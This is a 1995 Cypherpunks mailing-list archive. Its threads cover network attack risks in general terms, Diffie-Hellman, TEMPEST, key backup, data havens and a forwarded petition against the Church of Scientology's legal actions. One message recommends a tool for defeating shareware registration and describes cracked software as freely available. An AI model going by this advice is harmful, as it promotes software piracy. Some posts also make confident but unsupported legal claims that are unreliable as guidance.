Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From perry at imsi.com Wed Jan 18 11:34:29 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Wed, 18 Jan 95 11:34:29 PST
Subject: (none)
In-Reply-To:
Message-ID: <9501181934.AA02176@snark.imsi.com>

"James A. Donald" says:
> On Wed, 18 Jan 1995, Perry E. Metzger wrote:
> > Be that as it may, people HAVE been kicked off for mischief like
> > forging routing packets -- and if someone started hosing me down with
> > any one of several really nasty packet based attacks I'm familiar with
> > I would expect action to be taken against them.
>
> Unix is broken. Windows and DOS are fragile and under construction.

This has nothing to do with Unix, Mr. Donald. This has to do with the nature of internet protocols.

> Servers should have built in limits, that cause them to spit back
> packets from unknown clients that are unreasonable or strain the
> system.

Can't be done. Sorry. There are certain flaws in the design of the internet protocols down on the transport layer that I'd rather not get into because they don't seem to be widely known and I'm not interested in making them better known.

> For example an SMTP server should have a default limit on volume
> per address and per client, with the user being able to vary
> such limits for particular clients or addresses -- trusted or
> hostile clients.

Sendmail already has such limits. Unfortunately they ultimately do no good. I'd try explaining, but the details get too technical -- if people insist I'll get into it. The gist is, however, that in the current network it's too easy to fake connections. Even with per client limits I could still make your machine die a horrible death.

> At present most unix utilities have arbitrary fixed length internal
> buffers for processing variable length fields.
If you overflow > the buffer by sending pathological data you will crash the system. Not usually, actually. The "utilities" have nothing to do with the kernel, and the kernel is what can crash the machine. > If you know machine code, and you overflow the buffer with > carefully chosen data then instead of a random crash you can > get the server to do some particular unexpected thing -- for > example the internet worm caused the server to execute a > file that the mail server had just received. Those sorts of security problems are not only well known but largely gone. The last one, in sendmail's debug flag, could only hurt a machine by action of a user on the machine itself, not over the network. The sorts of things I'm talking about are *inherent* in the design of TCP and cannot be altered at this point. > > I doubt it. It really hasn't proved to be an actual problem thus > > far. If anything, the limiting factor on scalability is the fact that > > the net has no locality of reference, which is making routing design > > harder and harder. Routing is currently THE big unsolved problem on > > the net -- something outsiders to the IETF rarely suspect, because the > > engineers have been faking it so well for so long. Unfortunately, all > > the good solutions to the routing problem are mathematically > > intractable -- and the practical ones are leading to bad potential > > long term problems.. > > This is inaccurate. Optimal solutions to the routing problem are > mathematically intractable. Tolerable solutions are mathematically > tractable. Name one, Mr. Donald. Name a single one. > For realistic routing problems, tractable approximations > are only worse than an optimal solution by a modest factor. Sorry, but you just don't know what you are talking about here, period. We don't know how to solve the routing problem in the general case. 
That's one of the reasons for all the arguments in the IETF concerning the problems we are getting ourselves into with route aggregation. (Just so you are clear here, Mr. Donald, the routing problem is NOT the problem of finding an optimal path between all pairs of nodes on a network in polynomial time -- that's solved and absolutely useless.)

> Of course I am sure Perry is correct when he says that
> the tractable approximations that we are currently using
> fail to scale, but this is not a fundamental unsolved
> problem in mathematics -- it is merely yet another bug.

Nope, not a bug. There are problems that we don't know how to solve. The problem is routing aggregation, you understand, and the fact that aggregated clouds don't really experience locality of reference. This means that we end up with nasty and totally artificial network choke points as the networks scale. If we transmit full information, however, we no longer get aggregation and can no longer store the tables because they are too big.

Perry

From jalicqui at prairienet.org Wed Jan 18 11:42:18 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 11:42:18 PST
Subject: EE Times on PRZ
Message-ID: <9501181942.AA27518@firefly.prairienet.org>

Strick wrote:
>THUS SPAKE jalicqui at prairienet.org (Jeff Licquia):
># Another quote from the article posted elsewhere said that, "PGP, which is
># based on the Diffie-Hellman public-key technology developed in the 1970s..."
># This is technically true, since all public-key work (including RSA) is based
># to some extent on DH. It could be, however, that the author is confusing
>
>DH uses "discrete log" as the hard problem, and very straightforward
>mathematics.
>
>RSA uses "factoring" as the hard problem, and a very clever back door.
>
>How do you decide if one is based on the other?

Sorry, I wasn't perfectly clear.
Of course, RSA is not based on Diffie-Hellman specifically; what I mean is that all public-key work is based on that general paper, which "invented" public-key cryptography. I think this very confusion may be plaguing the writer of the aforementioned article.

># public-key technology with Diffie-Hellman public-key in particular, which
># (as I understand it) is not particularly secure.
>
>It's still up in the air, isn't it, whether the discrete log or
>factoring is the harder to crack. My intuition is they're the
>same hard.

It was my impression that DH had a further weakness not related to the difficulty of the hard problem. As my copy of Schneier is at home, I must defer to ignorance at this point.

From joelm at eskimo.com Wed Jan 18 12:09:51 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Wed, 18 Jan 95 12:09:51 PST
Subject: TEMPEST
Message-ID: <199501182009.AA11815@mail.eskimo.com>

Tim May wrote:
>TEMPEST has very little to do with Cypherpunks goals, actually. First,
>buying such a gadget, tweaking it, exploring capabilities, etc., would
>lead to what? The ability to park a van in front of someone's house
>and--maybe--monitor their screens? We already know this is possible.
>(You all knew that, didn't you?)

If a Cypherpunk goal is to champion electronic privacy, it seems to me that it is important to fully understand any threats to the methods used to ensure privacy. The old Sun Tzu "know your enemy" philosophy. If I was running a Data Haven, I'd want to understand how and if my system could be passively eavesdropped on, and what countermeasures to take to minimize the risk. (Second or third down the list from knowing my encryption algorithm was secure.)

Granted, I'd spend more efforts with firewalls because a hacker/cracker attack would be a more realistic threat, but if there was even the most remote chance that a government agency/well-funded concern with TEMPEST capability was interested in me, I'd sure like to make their job more difficult.
The thing that I find frustrating about TEMPEST, is most informed people say "yes, it's possible," but I have encountered only breadcrumbs of real-world, technical information and sources on it (the VanEck article, the BBC tape, Grady Ward's paper, etc.). This is what prompted the original message to the list. Yes, TEMPEST is real. But what I'm trying to do is shift out TEMPEST reality (and capabilities) from the magical black-box in parked vans tales. Joel McNamara joelm at eskimo.com - finger for PGP key From rfb at lehman.com Wed Jan 18 12:14:06 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Wed, 18 Jan 95 12:14:06 PST Subject: What is this? Anonymous message failed In-Reply-To: Message-ID: <9501182012.AA11306@cfdevx1.lehman.com> Date: Wed, 18 Jan 1995 09:59:54 -0800 From: Lucky Green Just got back a message from Julf's remailer that my Anonymous message failed (wrong password). Needless to say, I didn't try to send one through the remailer. The message it was refering to is the one I sent to the list earlier. Is this a repeat of the an/na problems we had in the past? Yes. The bounce message that I got back included this header line: X-Envelope-To: an157790 I sent a message to and got back a reply stating that the person had unsubscribed hirself and may resubscribe ``in the clear''. Rick From tcmay at netcom.com Wed Jan 18 13:09:58 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 13:09:58 PST Subject: TEMPEST In-Reply-To: <199501182009.AA11815@mail.eskimo.com> Message-ID: <199501182032.MAA19257@netcom12.netcom.com> Joel McNamara wrote: (quoting me) > >TEMPEST has very little to do with Cypherpunks goals, actually. First, > >buying such a gadget, tweaking it, exploring capabilities, etc., would > >lead to what? The ability to park a van in front of someone's house > >and--maybe--monitor their screens? We already know this is possible. > >(You all knew that, didn't you?) 
> > If a Cypherpunk goal is to champion electronic privacy, it seems to me that > it is important to fully understand any threats to the methods used to > ensure privacy. The old Sun Tzu "know your enemy" philosophy. If I was > running a Data Haven, I'd want to understand how and if my system could be > passively eavesdropped on, and what countermeasures to take to minimize the > risk. (Second or third down the list from knowing my encryption algorithm > was secure.) Sure, let us know what you find. I'm not being catty here; I'm making a serious point about return on investment. My guess is that getting a reasonable Van Eck capability could cost $10K, maybe less, maybe more. And what would this show that we basically don't already know in principle? (We've all seen televisions showing "interference" from computers, so we know that signals are getting out....) And if nothing is seen with our $10K of equipment, what does this prove against an attacker who can easily afford to spend 20 or 30 times that amount to equip a van? Cypherpunks have been exploiting technology that is comparatively _much cheaper_ and which changes the equation. But, again, let me not discourage you (Joel) from becoming our expert on TEMPEST and Van Eck emissions. You may find it fun, and maybe even profitable (consulting for corporations to harden their sites, for example). I just object to the "we ought to be doing this" mentality. In general, for reasons many of us have written about here before, and in particular, because I think spending $10,000 to prove what we already know--that RF emissions can be detected and demodulated--is a poor use of money. That $10K would go a long way to getting PGP Phone finished. > The thing that I find frustrating about TEMPEST, is most informed people say > "yes, it's possible," but I have encountered only breadcrumbs of real-world, > technical information and sources on it (the VanEck article, the BBC tape, > Grady Ward's paper, etc.). 
This is what prompted the original message to > the list. Yes, TEMPEST is real. But what I'm trying to do is shift out > TEMPEST reality (and capabilities) from the magical black-box in parked vans > tales. Then go for it. Make this your specialty, your contribution to the Cause. But beware of empty exhortations that "somebody ought to work on this." "We have met the somebody, and he is us." --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From mab at research.att.com Wed Jan 18 13:27:32 1995 From: mab at research.att.com (Matt Blaze) Date: Wed, 18 Jan 95 13:27:32 PST Subject: Threats in real life - what are we worried about? Message-ID: <9501182129.AA18239@merckx.info.att.com> Tim May writes: > TEMPEST has very little to do with Cypherpunks goals, actually. First, > buying such a gadget, tweaking it, exploring capabilities, etc., would > lead to what? The ability to park a van in front of someone's house > and--maybe--monitor their screens? We already know this is possible. > (You all knew that, didn't you?) I disagree. "TEMPEST" risks and countermeasures are but one entry on a long list of subjects in which our ignorance (and that of the civilian security community in general) may well come back to bite us. Granted, this is the "cypherpunks" list, not the "securitypunks" list, but it behooves anybody interested in developing strong mechanisms to accomplish some security objective to be at least acquainted with how those mechanisms fit in the larger picture. 
One of the most dangerous aspects of cryptology (more dangerous, perhaps, than the fact that there are almost no solid theorems that tell us how secure practical ciphers really are) is that you can measure it. It's all too tempting to misuse an estimate for the cryptographic work factor for some cipher as if it were some kind of overall security metric for the systems in which it is deployed. In real life, there are lots of ways to violate system security, including cryptanalysis, protocol attacks, Trojan horses, viruses, electromagnetic monitoring, physical compromise, rubber hose cryptanalysis, OS bug exploitation, application bug exploitation, hardware bug exploitation, user error exploitation, physical monitoring, social engineering, court orders, dumpster diving, and so on and so on.

Most of us on the list like to think about cryptography and cryptographic protocols, and that's fine, but it isn't the same as thinking about building secure systems that are strong enough to withstand attackers who aren't willing to restrict themselves to a strictly cryptographic threat model.

Unfortunately, the world outside the cypherpunks list isn't much better off than we are in understanding these "informal", but all too real, threats. Thinking about some of them would, I think, go a long way toward contributing to "Cypherpunk goals" as I understand them. (Practical TEMPEST shielding is one such problem. Another good one is the almost completely ignored problem of storing secret keys on networked computers. Still another is the problem of using security software remotely with limited local computation. There are lots more.)

That said, no one can force these discussions to happen, and no one, much less me, has a right to complain that everyone else is talking about the "wrong stuff". So let me raise a question:

Given existing crypto tools (PGP, etc), what are the top ten practical attacks against the privacy of stored data and electronic mail? Who are the bad guys?
What tools do we need to limit these threats?

I'll post my own thoughts later.

-matt

From andrew_loewenstern at il.us.swissbank.com Wed Jan 18 13:51:11 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Wed, 18 Jan 95 13:51:11 PST
Subject: EE Times on PRZ
Message-ID: <9501182146.AA03035@ch1d157nwk>

jalicqui at prairienet.org (Jeff Licquia) wrote:
> It was my impression that DH had a further weakness not related to
> the difficulty of the hard problem. As my copy of Schneider is at
> home, I must defer to ignorance at this point.

My understanding is that once you do the computation to solve a DH exchange you can use that information to easily solve any exchange under the same generator and modulus. So it's important to at least use large enough numbers to make this infeasible. I think it was Sun's SecureRPC that shipped with a fixed (and not big enough) generator and modulus and was not secure (assuming someone had already done the pre-computation). Maybe this is what you were thinking of?

As always, proper generation of components is an important consideration in implementing public-key systems.

andrew

From adam at bwh.harvard.edu Wed Jan 18 14:01:12 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Wed, 18 Jan 95 14:01:12 PST
Subject: Key backup (was: How do I know . ..)
In-Reply-To: <199501181754.MAA24686@bb.hks.net>
Message-ID: <199501182200.RAA08888@freud.bwh.harvard.edu>

D.C. Williams wrote:
| With barcoding as the standard, another person prints his key on a small
| unmarked card and hides it somewhere deemed to be secure by him. The
| UPC-label attack fails because his keyring isn't disguised as UPC product
| labels. How does the attacker know what to look for?
|
| True Paranoids could devise some sort of "invisible ink" method,
| requiring UV or heat exposure before the barcode becomes visible.
| Now your backup key looks like a blank sheet of paper.
;-)

Picking a few nits:

Putting the UPC's on things other than cards (such as books) makes it easier to hide in the open. `UPC' stickers on, say, a few books are easier to miss than UPC stickers on index cards.

Invisible ink draws attention to the correct UPC's once they know you're using it. See Kahn for a discussion of secret inks being developed during the second world war. If you want to hide bits, they should be stripped of low entropy parts and hidden with a stego program.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From pstemari at erinet.com Wed Jan 18 15:42:52 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 15:42:52 PST
Subject: Another problem w/Data Havens...
Message-ID: <9501182333.AA09451@eri.erinet.com>

At 05:05 PM 1/17/95 -0700, Ben.Goren at asu.edu wrote:
> ... That's the main reason why I like my idea of having a trusted encryptor.
>Nobody's suggested that the current timestamp operators would be in Deep
>Doo-Doo if they timestamped some piece of thoughtcrime; why should
>somebody who encrypts be any different? ...

Quite possibly the timestampers would be in trouble, the risk for them is the same as the risk for the remailers and the DH operators. As long as some piece of info is considered to be a thought-crime, everyone who accepts info from a wide range of sources is at risk.

> ... The service could even be advertised as a different form of timestamping
>(or notarizing). Not only do you get the file back signed, but you get it
>back encrypted and signed. ...

That would still be a useful service, however, but it does transfer the risk from the DH operator to the encryptor. Since he isn't leaving evidence on a hard drive, his window of vulnerability is somewhat less.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From dcwill at ee.unr.edu Wed Jan 18 15:53:40 1995
From: dcwill at ee.unr.edu (Dr. D.C.
Williams) Date: Wed, 18 Jan 95 15:53:40 PST Subject: Key backup (was: How do I know . ..) Message-ID: <199501182358.SAA29305@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- 'Adam Shostack' was reported to have written: > Putting the UPC's on things other than cards (such as books) > makes it easier to hide in the open. `UPC' stickers on, say, a few > books are easier to miss than UPC stickers on index cards. Exactly. If the intention is to keep them out in the open, then making labels which resemble UPCs is preferred. However, if I'm going to dig a hole in the ground at a secret location and bury my barcoded key in a special container, a different format might be indicated. > Invisible ink draws attention to the correct UPC's once they > know you're using it. See Kahn for a discussion of secret inks being > developed during the second world war. I'll do that, but I think you might be intermixing ideas. Pseudo-UPCs in invisible ink wouldn't be a good combination. Pseudo-UPCs should probably be printed exactly like normal UPCs. If you want the "invisible ink" process, it should probably blend into the ambient environment as much as possible. Even if "they" know you're using secret ink, don't "they" have to find the printed key first? How much work is required to check every page of every book and every sheet of paper you might have access to? You could mail your key anywhere in the world invisibly printed on the outside of an envelope. Better yet, send someone a special document (wedding announcement, legal document, 21st birthday card, whatever; the important part is to send something that the recipient will keep) with your keyring invisibly printed on it. Variations on this theme (there are many) are encouraged. Have a friend check out a library book and let you stamp your key somewhere inside. It's the number of possible variations that make this seemingly impossible to attack. Apologies if this "secret ink" stuff is way off base ;-) . 
Most people (myself included) would opt for the "split and disguise" or "hidden/buried" key schemes where secret ink wouldn't add much security. > If you want to hide bits, they > should be stripped of low entropy parts and hidden with a stego > program. The idea was to use something other than magnetic media. A new and different optical encoding method could be devised to hide a key in a halftone, but the barcode example was offered as one possibility using an existing standard. The basis for this thread was the perceived need for a relatively simple key backup system that didn't require the active participation of a whole hoard of people. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLx2rEyoZzwIn1bdtAQEBVAGAzJc1fOAchLGEIlnbQBiJXV2cICE2WK8e 8FnXnP8ztcWEdUCYY0vjDewiLI2iW4bt =tUR2 -----END PGP SIGNATURE----- From pstemari at erinet.com Wed Jan 18 16:24:19 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 18 Jan 95 16:24:19 PST Subject: Does encrypted equal safe? Message-ID: <9501182334.AB09451@eri.erinet.com> At 04:55 PM 1/17/95, Sandy Sandfort wrote: > ... In my law school they taught that the burden of proof in a >criminal case was on the government. Unless of course the case involves porn, drugs, etc, in which case the current practice in the American legal system places the onus on the accused, regardless of what the Constitution requires. Civil forfeiture is a fine example of this, along with requiring porn producers to demonstrate the age of their models, etc ad nauseum. --Paul J. Ste. 
Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From Ben.Goren at asu.edu Wed Jan 18 16:37:19 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Wed, 18 Jan 95 16:37:19 PST
Subject: Another problem w/Data Havens...
Message-ID:

At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote:
>[. . .] As long as
>some piece of info is considered to be a thought-crime, everyone who accepts
>info from a wide range of sources is at risk.

We might have a test case right now for part of that idea--the Scientologists. They're essentially claiming that the various newsgroups should be shut down because somebody put thoughtcrime on them.

I would posit that the operator of any automated data transmission/massaging service is not responsible for the data that passes through her equipment. Consider, for example, if I used a bang path to route an illicit email note through, say, apple.com. Does that make Apple Computer responsible for what I send?

Tying in with some of Eric's comments, this could be viewed as a fundamental flaw in the 'net: it's the sender, generally, who initiates and controls the connection, not the recipient. We could view this as an advantage: how can you blame me for what somebody else does to my computer without my knowledge, especially if I have no way to stop it short of getting off the 'net completely?

>> ... The service could even be advertised as a different form of timestamping
>>(or notarizing). Not only do you get the file back signed, but you get it
>>back encrypted and signed. ...
>
>That would still be a useful service, however, but it does transfer the risk
>from the DH operator to the encryptor. Since he isn't leaving evidence on a
>hard drive, his window of vulnerability is somewhat less.

Less to nonexistent. If no human sees it on the encrypting site, no human can be responsible for it. "They" would have to ban the service outright, or try to prove that you knew that your site would be used for illicit purposes.
If putting a warning to not export crypto software on an ftp site is sufficient protection--and, judging from the number of sites which do no more than that, it is--then a simple statement that the service is not to be used for any illegal purpose should do fine here. > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From tcmay at netcom.com Wed Jan 18 16:39:11 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 16:39:11 PST Subject: Good "Economist" article on Cyberspace Message-ID: <199501190038.QAA23631@netcom4.netcom.com> [I'm getting no Cypherpunks list traffic today, only mail sent to me directly, so I apologize if this has come up already.] The Jan 14-20 issue of "The Economist" has a good article on "Who speaks for cyberspace?," which does a good job of summarizing the civil libertarian arguments and why the EFF "imploded." ... "Little wonder that many Internet pioneers thought they had stumbled upon an electronic Utopia....If a single set of beliefs can be said to dominate the politics of cyberspace, it is radical libertarianism..." About the withdrawal of the EFF from the political fray: "That leaves cyberspace's radical libertarians without a voice in Washington. They're probably delighted." I know I am. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. 
FAQ available at ftp.netcom.com in pub/tc/tcmay

From frissell at panix.com Wed Jan 18 17:22:42 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 18 Jan 95 17:22:42 PST
Subject: Good "Economist" article on Cyberspace
In-Reply-To: <199501190038.QAA23631@netcom4.netcom.com>
Message-ID:

Right Tim it was a great article in the Economist Tradition. I'll post it as soon as it makes it into the databases.

Unbelievable Barlow Quote:

On-line purists might want nothing to do with government, but government was likely to intrude anyway. So the EFF sought to minimise the intrusion; "to keep Pharaoh from following us into the Red Sea," as Mr. Barlow puts it.

I *want* Pharaoh to follow us into the Red Sea, myself.

DCF

--
You don't have to be nice to nation states you meet on the way up if you're not coming back down.

From asgaard at sos.sll.se Wed Jan 18 17:45:03 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Wed, 18 Jan 95 17:45:03 PST
Subject: copyright and data havens
In-Reply-To:
Message-ID:

rishab at dxm.ernet.in wrote:
> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down
> eventually. What may be likely is distributed piracy markets, such as

In the foreseeable future (10 years?) there will exist jurisdictions that, even after signing this or that convention, will be more or less lax about pursuing violators. Thus I still believe, despite China's awaited submission, that the Internet and 28.8 modems (and abundance of disk space) are real threats to holders of copyright who want to protect every penny. Encryption (by the way, how long might it take to IDEA-encrypt a 2 MB .zip file? I never tried) will make it practically impossible to find and prosecute at least private copyright abuse.
They won't use thumbscrews to obtain the key to your SecureDrive just on suspicion of infringement (except possibly in Singapore).

The present situation, as we all know, is that few people are willing to pay for such software as games if they can get a (cracked) version for free. I think this attitude will expand to most software. The real war will be fought between protectors and crackers (since it is usually not convenient to export an opened, installed version to another system - and more so the bigger and directory-spreading the program is).

Actually, a sort of data haven for cracks already exists. If you live in a jurisdiction where cracks are illegal to advertize (let alone use) they can be hard to find on your local BBS, but with an Internet feed (or long distance modem calls) it's no problem at all. (For those who don't believe in the shareware concept I recommend the Norwegian nag-eliminator 'Buster' - although you need the registered version for the latest versions :-)

Mr La Macchia got caught. How many didn't? Look at the IRC Undernet: wArEz-bots all over the place - and I bet the net.cops are lagging in bot comprehension (unfortunately, so am I...). And there is talk about this Secure-IRC.

Mats

From skaplin at mirage.skypoint.com Wed Jan 18 18:02:40 1995
From: skaplin at mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 18 Jan 95 18:02:40 PST
Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd) (fwd)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I thought this was topical and VERY much of interest here.

Sam

- -------- Forwarded message --------

[Hurry! Signature tallying for this petition EXPIRES February 6, 1995! Be sure to send your signature to cos-petition at netcom.com -- see the instructions after the petition statement. The petition statement begins 68 lines down from here.]
Following this short introductory section is the petition statement to the Church of Scientology and affiliated organizations regarding their recent legal actions which have very serious ramifications for freedom of expression on Usenet and the Internet. It is somewhat long, but the length is necessary to give you sufficient information to make an informed decision.

I want to stress that this petition is NOT focused on the beliefs or practices of the Church of Scientology. Rather, it is focused on their recent legal action, and this petition demands that they reconsider these actions for the good of everyone, including themselves. It should also be made *very clear* that none of us should ever condone or support any action which would censor or inhibit Scientology supporters from being able to express their views and opinions on Usenet, the Internet, and all other electronic forums, provided they do so in accordance with accepted netiquette, as all of us should.

I encourage you to read the petition statement carefully, and if you agree with all three demands (given near the end of the statement), to then "sign" it via Internet e-mail using the instructions which follow the statement. Do follow EXACTLY the directions on how to "sign"; they are not difficult. Note that only those with valid Internet-accessible e-mail addresses can sign this petition. Fortunately, nearly all on-line services, such as CompuServe, and many BBS, do offer Internet e-mail access, so just about anybody who is electronically hooked up to some network in the world can sign this petition. If you are not sure what your Internet e-mail address is, ask your site's sysadmin/sysop for assistance.

Please do upload this petition statement as soon as possible to any BBS and on-line service in your area. If you have access to one of the major national on-line services such as CompuServe, Prodigy, AOL, etc., do try to upload it there. We are trying to get at least 5000 signatures.
Even more signatures are entirely possible if we each put in a little effort to inform others, such as friends and coworkers, about the importance of this petition to electronic freedom of expression. I plan to make the signatures publicly available on or shortly after February 7, 1995, and will also submit them to the Church of Scientology as well as the newsmedia. Important Note: Because of the unusual sensitivity of this petition, I will not submit nor reveal the e-mail signatures IF the total number of validated signatures is less than 1000. This offer is made for those who would feel "exposed" if their name appears on a list with a small number of signatures. I fully expect to surpass 1000 signatures in one or two days! In addition, unlike past net-petitions, providing one's full name in addition to one's e-mail address will be optional. However, I highly encourage you to be brave and include your full name, as all petitions are traditionally considered more "binding" if real names are used. I will tally the number of signatures with and without full names when the petition drive ends February 6, 1995. Thank you for your signature! Let's all do our part to keep all electronic networks free and open for everybody. Jon Noring (Disclaimer: Nothing written in this petition transmittal should be construed as legal advice. If you need legal assistance or advice concerning any of the issues brought up in this document, contact a qualified attorney.) **************** Beginning of Petition Statement ******************** TO: The Church of Scientology, The Religious Technology Center, Bridge Publications, Inc., Office of Special Affairs, and all other affiliated organizations, divisions and corporations of the Church of Scientology We, the undersigned, are disturbed by your recent legal attempts to stifle the free flow of information on the Internet and Usenet. 
Specifically, you have 1) threatened legal action against several automated anonymous remailers unless they filter out *all* e-mail targeted to the legitimate Usenet newsgroups alt.religion.scientology (a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all points of view about Scientology, both pro and con, are welcome, and 2) demanded and actually attempted the removal of a.r.s. in gross defiance of accepted Usenet practice and netiquette. Concerning 1), since nearly all (if not all) of the e-mail sent to a.r.s. and a.c.t. via the remailers is legitimate and originates from individuals who sincerely believe they need to post anonymously because of the nature of discussion, your demand, if implemented, would prevent these individuals from freely expressing their views in the proper forum. Freedom of expression is internationally recognized as one of the most important and sacred of basic human rights, and your demands fly in the face of this recognition. Your second demand, removing a.r.s., would go even further in inhibiting freedom of expression on all electronic networks. It is a *very* serious matter to attempt to remove forums of free expression. Your primary argument for issuing these legal threats, according to your statements, are that some people (the "perpetrators") have knowingly posted *alleged* (meaning not yet demonstrated in a court of law) Church of Scientology copyrighted and trade secret material to a.r.s. and a.c.t., sometimes using the anonymous remailers as the carrier (because of the common carrier-like nature of anonymous remailers, the administrators of the remailers have no knowledge of such activity taking place). 
Though we do not condone making copyrighted material available on any electronic network without the permission of the copyright holder, your specific legal threats are short-sighted, perceived to be mean-spirited, ineffective, and are on tenuous legal grounds because 1) It won't stop those who are determined to make available alleged copyrighted materials on electronic networks. They will find other avenues on the electronic networks to do so. Only prosecuting the actual perpetrators will deter this alleged illegal activity. 2) Your demands, if met, will have the effect of leading to significant stifling of free speech and the exchange of information on all electronic networks which, if not illegal in some jurisdictions, goes against all accepted conventions of a free and open society, 3) You have not stated, nor is there any indication, that you intend to work in a cooperative manner with legitimate law-enforcement agencies, the courts, and/or the Internet to locate and prosecute the perpetrators of the *alleged* copyright violations in the countries they originated. Thus, your threats are being construed, rightly or wrongly, by most on the electronic networks as an attempt to stifle free discussion on Scientology rather than trying to locate and prosecute the perpetrators of the *alleged* copyright and trade secret violations. With respect to the attempted removal of the newsgroup a.r.s., you also stated that the word 'scientology' is trademarked and thus the name a.r.s. infringes on such trademark. This is appallingly ludicrous based on past case law of similar situations, as well as your implicit acknowledgement of the legitimacy of a.r.s. by allowing Church of Scientology approved information to be posted to it by your supporters, and possibly with your knowledge and/or approval, ever since it was created July 1991, almost 3.5 years ago. Therefore, we, the undersigned, make the following demands. 
1) Regarding your charges of copyright violation over electronic networks: You will cease all legal action, now and in the future, against any person, company, organization, etc., associated or affiliated in any way with all electronic networks, including the Internet, except that action which is necessary to locate and prosecute the perpetrators (as previously defined) of alleged copyright and trade secret violations, and other activity in violation of law, and *only* in full cooperation with legitimate law-enforcement agencies and/or the courts. 2) Regarding your trademark challenge of the Usenet newsgroup alt.religion.scientology: You will cease all legal action, now and in the future, to remove any Usenet newsgroup, BBS forum, mailing list or other similar forum of public exchange of information over any electronic network, or to inhibit in any way the flow of information to and from these forums. This includes, for example, ceasing all legal action demanding a) the removal of the Usenet newsgroup alt.religion.scientology and b) that anonymous remailers add filters as previously described. 3) You will publicly and officially state a) That you support the existence of free and open forums on all electronic networks to discuss Scientology from all perspectives and points of view (which includes yours), and b) That you do not support nor condone attempts by any entity to electronically censor, remove, obstruct, or tamper with any electronic communication except when allowed by a valid court order. If you outright reject or refuse to even discuss these demands in a good faith manner on Usenet, we have no other option but to consider such rejection or refusal to even discuss to be an act of hostility by the Church of Scientology towards the users of all electronic networks and forums, including the Internet. 
We are certain you do not want this, and we do not want it either, so we offer to work with you any way we can with regard to any legitimate demands you may have concerning alleged copyright violation(s) and other illegal activity. However, any attempts by you of any kind to tamper or in any manner restrict the free flow of information (other than that *specifically* restricted by law -- and *only* that) on any electronic network is totally unacceptable and will not be tolerated for the reasons stated above. Signed, ******************* End of Petition Statement *********************** ====================================== Instructions for Signing This Petition ====================================== It must first be noted that this is a petition, not a vote. By "signing" it you agree with *all* the demands of the petition statement. If you do not agree with all the demands, then your only recourse is to not sign it. In addition, all e-mail signatures will be submitted to the Church of Scientology as well as the newsmedia provided more than 1000 validated signatures are obtained. Including your full name is optional, but very highly encouraged as that would add to the effectiveness of the petition. Signing via an anonymous remailer is discouraged, but not forbidden, as an attempt will be made to separately tally signatures from anonymous remailers. Signing this petition is not hard, but to make sure your signature is not lost or miscounted, please follow these directions exactly: 1) Prepare an e-mail message. In the main body (NOT the Subject line) of your e-mail include the ONE-LINE statement: SIGNED You need not include the "<" and ">" characters. 'SIGNED' should be capitalized. As stated above, your full name is optional, but highly recommended. If you do supply your name, please don't use a pseudonym or nickname, or your first name -- it's better to just leave it blank if it's not your full and real name. 
